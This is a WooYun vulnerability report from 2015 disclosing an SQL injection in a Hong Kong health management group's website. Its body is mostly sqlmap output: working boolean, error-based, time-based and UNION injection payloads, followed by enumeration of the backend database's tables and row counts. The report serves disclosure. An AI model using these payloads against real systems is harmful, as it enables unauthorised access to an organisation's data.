当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158806

漏洞标题:香港港安健康管理集团存在SQL注入漏洞(香港地區)

相关厂商:香港港安健康管理集团

漏洞作者: 路人甲

提交时间:2015-12-07 15:06

修复时间:2015-12-12 15:08

公开时间:2015-12-12 15:08

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

注入点

http://**.**.**.**/zxyh_show.php?id=77


sqlmap identified the following injection points with a total of 110 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=77 AND 4594=4594
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=77 AND (SELECT 6145 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6145=6145,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=77 AND (SELECT * FROM (SELECT(SLEEP(10)))IISk)
Type: UNION query
Title: MySQL UNION query (NULL) - 32 columns
Payload: id=-5708 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716271,0x737370427556544d7277,0x71786b6b71),NULL,NULL,NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] gazx
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=77 AND 4594=4594
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=77 AND (SELECT 6145 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(6145=6145,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=77 AND (SELECT * FROM (SELECT(SLEEP(10)))IISk)
Type: UNION query
Title: MySQL UNION query (NULL) - 32 columns
Payload: id=-5708 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716271,0x737370427556544d7277,0x71786b6b71),NULL,NULL,NULL,NULL#
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: gazx
[19 tables]
+-----------+
| book |
| case_co |
| case_lm |
| info_co |
| info_lm |
| job |
| job_yp |
| master |
| person |
| pro_co |
| pro_img |
| pro_lm |
| qq_co |
| seo_co |
| setup |
| tb_pro_co |
| tb_pro_lm |
| tol_co |
| tol_lm |
+-----------+
Database: gazx
+---------+---------+
| Table | Entries |
+---------+---------+
| info_co | 94 |
| pro_co | 21 |
| tol_co | 17 |
| seo_co | 7 |
| info_lm | 4 |
| tol_lm | 4 |
| pro_lm | 2 |
| book | 1 |
| master | 1 |
| qq_co | 1 |
| setup | 1 |
+---------+---------+

漏洞证明:

如上

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-12 15:08

厂商回复:

最新状态:

暂无